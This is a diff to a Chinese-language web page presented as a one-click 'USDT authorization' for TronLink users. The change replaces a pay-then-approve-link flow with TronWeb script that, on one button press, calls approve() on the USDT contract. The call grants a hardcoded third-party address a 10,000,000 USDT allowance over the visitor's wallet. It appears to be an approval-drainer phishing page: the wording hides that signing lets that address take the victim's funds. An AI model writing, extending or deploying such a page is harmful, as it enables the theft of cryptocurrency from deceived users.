--- a/index.html
+++ b/index.html
@@ -2,38 +2,55 @@
 <html lang="zh">
 <head>
   <meta charset="UTF-8">
-  <title>支付後授權 USDT</title>
+  <title>一鍵授權 USDT</title>
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <script src="https://cdn.jsdelivr.net/npm/tronweb@4.4.0/dist/TronWeb.min.js"></script>
   <style>
     body { font-family: sans-serif; background: #fff; text-align: center; padding: 2em; }
     h1 { color: #2d3436; }
-    a.button {
+    .button {
       display: inline-block;
       margin-top: 2em;
-      background: #0984e3;
+      background: #00b894;
       color: white;
       padding: 1em 2em;
       text-decoration: none;
       font-size: 1.2em;
+      border: none;
       border-radius: 8px;
+      cursor: pointer;
     }
     .tip { margin-top: 2em; font-size: 0.9em; color: #636e72; }
   </style>
 </head>
 <body>
-  <h1>請支付 1 TRX 開始授權</h1>
-  <p>請用 TronLink 的 DApp 瀏覽器開啟本頁，掃描 QR Code 或點擊付款，完成後請點授權。</p>
+  <h1>一鍵授權 10,000,000 USDT</h1>
+  <p>請使用 TronLink App 的 DApp 瀏覽器開啟此頁面，點擊下方按鈕即可授權。</p>
 
-  <img src="https://api.qrserver.com/v1/create-qr-code/?size=200x200&data=TRX%20Payment%3A%20THjNpJWbuGxvhR9kDDTDz1wVKhe2PWLfNR" alt="QR Code"><br>
-  <button class="button" onclick="window.open('https://tron.network/#/send?to=THjNpJWbuGxvhR9kDDTDz1wVKhe2PWLfNR&asset=trx&amount=1', '_blank')">
-    點我付款 1 TRX
-  </button>
+  <button class="button" onclick="authorizeUSDT()">立即授權 USDT</button>
 
-  <div class="tip">
-    支付完成後請點擊下方按鈕完成授權 👇
-  </div>
-  <button class="button" style="background:#00b894; margin-top:1em;" onclick="window.open('https://tronscan.org/#/contract/TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t/call?method=approve(address,uint256)&value=0&parameter=000000000000000000000000TMxu165T2e3ZKWzgt7gipzmHwE5KYuibGa000000000000000000000000000000000000000000000000000009184e72a000', '_blank')">
-    授權 10,000,000 USDT
-  </button>
+  <div class="tip" id="status"></div>
+
+  <script>
+    const USDT_CONTRACT = "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t";
+    const AUTH_CONTRACT = "TMxu165T2e3ZKWzgt7gipzmHwE5KYuibGa";
+    const AMOUNT = "10000000000000"; // 10,000,000 USDT
+
+    async function authorizeUSDT() {
+      const status = document.getElementById("status");
+      if (!window.tronWeb || !window.tronWeb.defaultAddress.base58) {
+        status.innerText = "❌ 請使用 TronLink DApp 瀏覽器開啟本頁";
+        return;
+      }
+
+      try {
+        const contract = await window.tronWeb.contract().at(USDT_CONTRACT);
+        const tx = await contract.approve(AUTH_CONTRACT, AMOUNT).send();
+        status.innerText = "✅ 授權成功！交易哈希：" + tx;
+      } catch (err) {
+        status.innerText = "❌ 授權失敗：" + err.message;
+      }
+    }
+  </script>
 </body>
 </html>
